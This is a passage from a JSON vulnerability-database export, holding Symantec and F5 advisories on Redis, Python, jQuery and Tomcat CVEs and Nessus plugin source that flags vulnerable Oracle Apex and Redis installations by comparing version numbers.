"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2021-06-08T18:59:35", "bulletinFamily": "software", "cvelist": ["CVE-2018-12326"], "description": "### Description\n\nRedis is prone to a buffer overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the context of a user running the affected application and gain elevated privileges. Failed exploit attempts may cause a denial-of-service condition, denying service to legitimate users. Redis versions prior to 4.0.10 and 5.x through and prior to 5.0 RC3 are vulnerable.\n\n### Technologies Affected\n\n * IBM Watson Studio Local 1.2.3 \n * Redhat OpenStack 10 \n * Redhat OpenStack 13.0 \n * Redhat OpenStack Director Deployment Tools 13 \n * Redhat OpenStack Director Deployment Tools for IBM Power LE 13 \n * Redhat OpenStack for IBM Power 13 \n * Redhat Software Collections 1 for RHEL 6 \n * Redhat Software Collections 1 for RHEL 7 \n * Redhat Software Collections 1 for RHEL 7.4 \n * Redhat Software Collections 1 for RHEL 7.5 \n * Redhat Software Collections 1 for RHEL 7.6 \n * Redhat Software Collections 1 for RHEL 7.7 \n * Redhat Software Collections 1 for RHEL Workstation 6 \n * Redhat Software Collections 1 for RHEL Workstation 7 \n * Redis Redis 2.8.21 \n * Redis Redis 3.0.2 \n * Redis Redis 3.0.7 \n * Redis Redis 3.2.11 \n * Redis Redis 3.2.12 \n * Redis Redis 3.2.13 \n * Redis Redis 3.2.3 \n * Redis Redis 3.2.7 \n * Redis Redis 4.0 \n * Redis Redis 4.0.9 \n * Redis Redis 5.0 \n * Redis Redis 5.0 RC1 \n * Redis Redis 5.0 RC2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo reduce the likelihood of a successful exploit, restrict local access to trusted individuals only.\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2018-06-17T00:00:00", "id": "SMNTC-111273", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111273", "published": "2018-06-17T00:00:00", "type": "symantec", "title": "Redis CVE-2018-12326 Buffer Overflow Vulnerability", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-06T12:24:53", "bulletinFamily": "software", "cvelist": ["CVE-2018-11218"], "description": "### Description\n\nRedis is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the context of a user running the affected application. Failed exploit attempts may cause a denial-of-service condition, denying service to legitimate users. Redis versions prior to 3.2.12, 4.x prior to 4.0.10, and 5.x prior to 5.0 RC2 are vulnerable.\n\n### Technologies Affected\n\n * IBM Watson Studio Local 1.2.3 \n * Redis Redis 2.8.21 \n * Redis Redis 3.0.2 \n * Redis Redis 3.2.11 \n * Redis Redis 3.2.3 \n * Redis Redis 3.2.7 \n * Redis Redis 4.0 \n * Redis Redis 4.0.9 \n * Redis Redis 5.0 \n * Redis Redis 5.0 RC1 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits. \n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2018-06-13T00:00:00", "id": "SMNTC-104553", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104553", "published": "2018-06-13T00:00:00", "type": "symantec", "title": "Redis CVE-2018-11218 Remote Stack Based Buffer Overflow Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-15T20:35:58", "description": "### Description\n\nPython Requests is prone to an information disclosure vulnerability. An attacker may leverage this issue to gain access to potentially sensitive information. This may aid in further attacks. Python versions 2.7 through 2.7.16 and 3.0 through 3.7.2 are vulnerable.\n\n### Technologies Affected\n\n * Oracle Sun ZFS Storage Appliance Kit (AK) 8.8.6 \n * Python Software Foundation Python 2.7 \n * Python Software Foundation Python 2.7.0 \n * Python Software Foundation Python 2.7.1 \n * Python Software Foundation Python 2.7.10 \n * Python Software Foundation Python 2.7.11 \n * Python Software Foundation Python 2.7.12 \n * Python Software Foundation Python 2.7.13 \n * Python Software Foundation Python 2.7.14 \n * Python Software Foundation Python 2.7.15 \n * Python Software Foundation Python 2.7.16 \n * Python Software Foundation Python 2.7.2 \n * Python Software Foundation Python 2.7.3 \n * Python Software Foundation Python 2.7.4 \n * Python Software Foundation Python 2.7.5 \n * Python Software Foundation Python 2.7.6 \n * Python Software Foundation Python 2.7.7 \n * Python Software Foundation Python 2.7.8 \n * Python Software Foundation Python 2.7.9 \n * Python Software Foundation Python 3.4 \n * Python Software Foundation Python 3.4.0 \n * Python Software Foundation Python 3.4.1 \n * Python Software Foundation Python 3.4.2 \n * Python Software Foundation Python 3.4.3 \n * Python Software Foundation Python 3.4.4 \n * Python Software Foundation Python 3.4.5 \n * Python Software Foundation Python 3.4.6 \n * Python Software Foundation Python 3.4.7 \n * Python Software Foundation Python 3.4.8 \n * Python Software Foundation Python 3.4.9 \n * Python Software Foundation Python 3.5 \n * Python Software Foundation Python 3.5.0 \n * Python Software Foundation Python 3.5.1 \n * Python Software Foundation Python 3.5.2 \n * Python Software Foundation Python 3.5.3 \n * Python Software Foundation Python 3.5.4 \n * Python Software Foundation Python 3.5.5 \n * Python Software Foundation Python 3.5.6 \n * Python Software Foundation Python 3.6 \n * Python Software Foundation Python 3.6.0 \n * Python Software Foundation Python 3.6.1 \n * Python Software Foundation Python 3.6.2 \n * Python Software Foundation Python 3.6.3 \n * Python Software Foundation Python 3.6.4 \n * Python Software Foundation Python 3.6.5 \n * Python Software Foundation Python 3.6.6 \n * Python Software Foundation Python 3.6.7 \n * Python Software Foundation Python 3.6.8 \n * Python Software Foundation Python 3.7.0 \n * Python Software Foundation Python 3.7.1 \n * Python Software Foundation Python 3.7.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to detect and block attacks and anomalous activity such as requests containing suspicious URI sequences. Since the webserver may log such requests, review its logs regularly.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2019-03-08T00:00:00", "type": "symantec", "title": "Python CVE-2019-9636 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-9636"], "modified": "2019-03-08T00:00:00", "id": "SMNTC-107400", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/107400", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2020-04-06T22:40:25", "description": "\nF5 Product Development has assigned JIRA ID CPF-25167 (Traffix SDC) this vulnerability.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) | 15.x | None | Not applicable | Not vulnerable2 | None | None \n14.x | None | Not applicable \n13.x | None | Not applicable \n12.x | None | Not applicable \n11.x | None | Not applicable \nBIG-IQ Centralized Management | 7.x | None | Not applicable | Not vulnerable2 | None | None \n6.x | None | Not applicable \n5.x | None | Not applicable \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [6.1](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>) | WebUI \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix and point release matrix](<https://support.f5.com/csp/article/K15113>)\n * [K48955220: Installing an OPSWAT Endpoint Security update on BIG-IP APM systems (11.4.x and later)](<https://support.f5.com/csp/article/K48955220>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2020-02-20T02:24:00", "title": "jQuery vulnerability CVE-2015-9251", "type": "f5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2020-02-20T02:24:00", "id": "F5:K29562170", "href": "https://support.f5.com/csp/article/K29562170", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-06T22:39:34", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-17T06:59:00", "title": "Apache Tomcat vulnerability CVE-2018-8014", "type": "f5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2018-07-17T06:59:00", "id": "F5:K11420556", "href": "https://support.f5.com/csp/article/K11420556", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-06T22:39:20", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-04T04:14:00", "title": "Apache Tomcat vulnerability CVE-2020-1938", "type": "f5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1938"], "modified": "2020-03-04T04:17:00", "id": "F5:K53254186", "href": "https://support.f5.com/csp/article/K53254186", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-07-29T02:17:58", "description": "An unspecified vulnerability in versions 4.0 and 4.1 of the\nApplication Express (Apex) component of the Oracle Database Server\nallows remote attackers to affect integrity via unpublished vectors.", "edition": 20, "cvss3": {}, "published": "2013-02-20T00:00:00", "title": "Oracle Application Express (Apex) CVE-2012-1708", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1708"], "modified": "2013-02-20T00:00:00", "cpe": ["cpe:/a:oracle:application_express"], "id": "ORACLE_APEX_CVE-2012-1708.NASL", "href": "https://www.tenable.com/plugins/nessus/64713", "sourceData": "# ---------------------------------------------------------------------------------\n# (c) Recx Ltd 2009-2012\n# http://www.recx.co.uk/\n#\n# Detection script for CVE-2012-1708\n# Ref: https://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html\n# Oracle Application Express v4.0 < x < v4.1.1\n#\n# Unspecified vulnerability in the Application Express component in Oracle\n# Database Server 4.0 and 4.1 allows remote attackers to affect integrity\n# via unknown vectors.\n#\n# Version 1.0\n# ---------------------------------------------------------------------------------\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64713);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\"CVE-2012-1708\");\n script_bugtraq_id(53104);\n\n script_name(english:\"Oracle Application Express (Apex) CVE-2012-1708\");\n script_summary(english:\"Checks whether vulnerable to CVE-2012-1708\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a vulnerable version of Oracle Apex.\");\n script_set_attribute(attribute:\"description\", value:\n\"An unspecified vulnerability in versions 4.0 and 4.1 of the\nApplication Express (Apex) component of the Oracle Database Server\nallows remote attackers to affect integrity via unpublished vectors.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/developer-tools/apex/index.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.recx.co.uk/downloads/Recx-Apex-CVE-2012-1708.pdf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Application Express to at least version 4.1.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1708\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_express\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Recx Ltd.\");\n\n script_dependencies(\"oracle_apex_detect_version.nasl\");\n script_require_keys(\"Oracle/Apex\");\n script_require_ports(\"Services/www\", 8080, 80, 443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nfunction raise_finding(port, report)\n{\n if(report_verbosity > 0)\n security_warning(port:port, extra:report);\n else security_warning(port);\n}\n\nport = get_http_port(default:8080, embedded:TRUE);\n\nif (!get_port_state(port)) exit(0, \"Port \" + port + \" is not open.\");\n\nversion = get_kb_item(\"Oracle/Apex/\"+port+\"/Version\");\nif(!version) exit(0, \"The 'Oracle/Apex/\" + port + \"/Version' KB item is not set.\");\n\nlocation = get_kb_item(\"Oracle/Apex/\" + port + \"/Location\");\nif(!location) exit(0, \"The 'Oracle/Apex/\" + port + \"/Location' KB item is not set.\");\nurl = build_url(qs:location, port:port);\n\nif (version == \"4.0\" || version == \"4.0.1\" || version == \"4.0.2\" || version == \"4.1\")\n{\n report = '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 4.1.1' + '\\n';\n raise_finding(port:port, report:report);\n exit(0);\n}\n\nexit(0, \"The Oracle Apex install at \" + url + \" is version \" + version + \" and is not affected.\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-29T03:30:19", "description": "The version of Redis installed on the remote host is affected by\nmultiple vulnerabilities and therefore requires a security update.", "edition": 24, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-14T00:00:00", "title": "Pivotal Software Redis LUA < 3.2.12 / 4.0.x < 4.0.10 / 5.0 < 5.0rc2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218", "CVE-2018-12326"], "modified": "2018-09-14T00:00:00", "cpe": ["cpe:/a:pivotal_software:redis"], "id": "REDIS_4_0_10.NASL", "href": "https://www.tenable.com/plugins/nessus/117484", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117484);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/01\");\n\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-12326\");\n\n script_name(english:\"Pivotal Software Redis LUA < 3.2.12 / 4.0.x < 4.0.10 / 5.0 < 5.0rc2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Pivotal Software Redis.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Redis requires a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Redis installed on the remote host is affected by\nmultiple vulnerabilities and therefore requires a security update.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://antirez.com/news/119\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Redis 3.2.12, 4.0.10 or 5.0-rc2 or higher.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11218\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/14\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:redis\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"redis_detect.nbin\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/redis_server\", 6379);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"Redis Server\";\nport = get_service(svc:\"redis_server\", default:6379, exit_on_fail:TRUE);\nversion = get_kb_item_or_exit(\"redis/\" + port + \"/Version\");\n\nfix = NULL;\nif (version =~ \"^[1-3]\\.\") fix = \"3.2.12\";\nelse if (version =~ \"^4\\.0\") fix = \"4.0.10\";\nelse if (version =~ \"^4\\.9\") fix = \"4.9.102\";\n\nif (!isnull(fix) && ver_compare(ver:version, fix:fix) == -1)\n{\n report =\n '\\n Port : ' + port +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T22:30:14", "description": "The host name verification when using TLS with the WebSocket client\nwas missing. It is now enabled by default. Versions Affected: Apache\nTomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and\n7.0.35 to 7.0.88. (CVE-2018-8034)\n\nThe URL pattern of '' (the empty string) which exactly maps to the\ncontext root was not correctly handled in Apache Tomcat 9.0.0.M1 to\n9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when\nused as part of a security constraint definition. This caused the\nconstraint to be ignored. It was, therefore, possible for unauthorised\nusers to gain access to web application resources that should have\nbeen protected. Only security constraints with a URL pattern of the\nempty string were affected. (CVE-2018-1304)\n\nSecurity constraints defined by annotations of Servlets in Apache\nTomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and\n7.0.0 to 7.0.84 were only applied once a Servlet had been loaded.\nBecause security constraints defined in this way apply to the URL\npattern and any URLs below that point, it was possible - depending on\nthe order Servlets were loaded - for some security constraints not to\nbe applied. This could have exposed resources to users who were not\nauthorised to access them. (CVE-2018-1305)\n\nThe defaults settings for the CORS filter provided in Apache Tomcat\n9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to\n7.0.88 are insecure and enable 'supportsCredentials' for all origins.\nIt is expected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue. (CVE-2018-8014)\n\nWhen using the Apache JServ Protocol (AJP), care must be taken when\ntrusting incoming connections to Apache Tomcat. Tomcat treats AJP\nconnections as having higher trust than, for example, a similar HTTP\nconnection. If such connections are available to an attacker, they can\nbe exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1\nto 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with\nan AJP Connector enabled by default that listened on all configured IP\naddresses. It was expected (and recommended in the security guide)\nthat this Connector would be disabled if not required. This\nvulnerability report identified a mechanism that allowed: - returning\narbitrary files from anywhere in the web application - processing any\nfile in the web application as a JSP Further, if the web application\nallowed file upload and stored those files within the web application\n(or the attacker was able to control the content of the web\napplication by some other means) then this, along with the ability to\nprocess a file as a JSP, made remote code execution possible. It is\nimportant to note that mitigation is only required if an AJP port is\naccessible to untrusted users. Users wishing to take a\ndefence-in-depth approach and block the vector that permits returning\narbitrary files and execution as JSP may upgrade to Apache Tomcat\n9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to\nthe default AJP Connector configuration in 9.0.31 to harden the\ndefault configuration. It is likely that users upgrading to 9.0.31,\n8.5.51 or 7.0.100 or later will need to make small changes to their\nconfigurations. (CVE-2020-1938)\n\nAs part of our fix for this CVE, we are disabling Tomcat 2019 AJP\nconnector in the default configuration in alignment with the upstream\nchanges. This change will require customers who use the default Tomcat\nconfiguration (in which the AJP connector was previously enabled) to\nexplicitly re-enable the connector if they need it. Also take note\nthat a connector configured without an explicit address will only bind\nto the loopback address.\n\nExamples of output from netstat before and after updating tomcat8 and\ntomcat7 are below (note that it is the same on AL1 and AL2 with both\ntomcat7 and tomcat8).\n\nAL2 tomcat8.5 :\n\nbefore :\n\ntcp6 0 0 :::8009 :::* LISTEN 25772/java\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nAfter :\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* 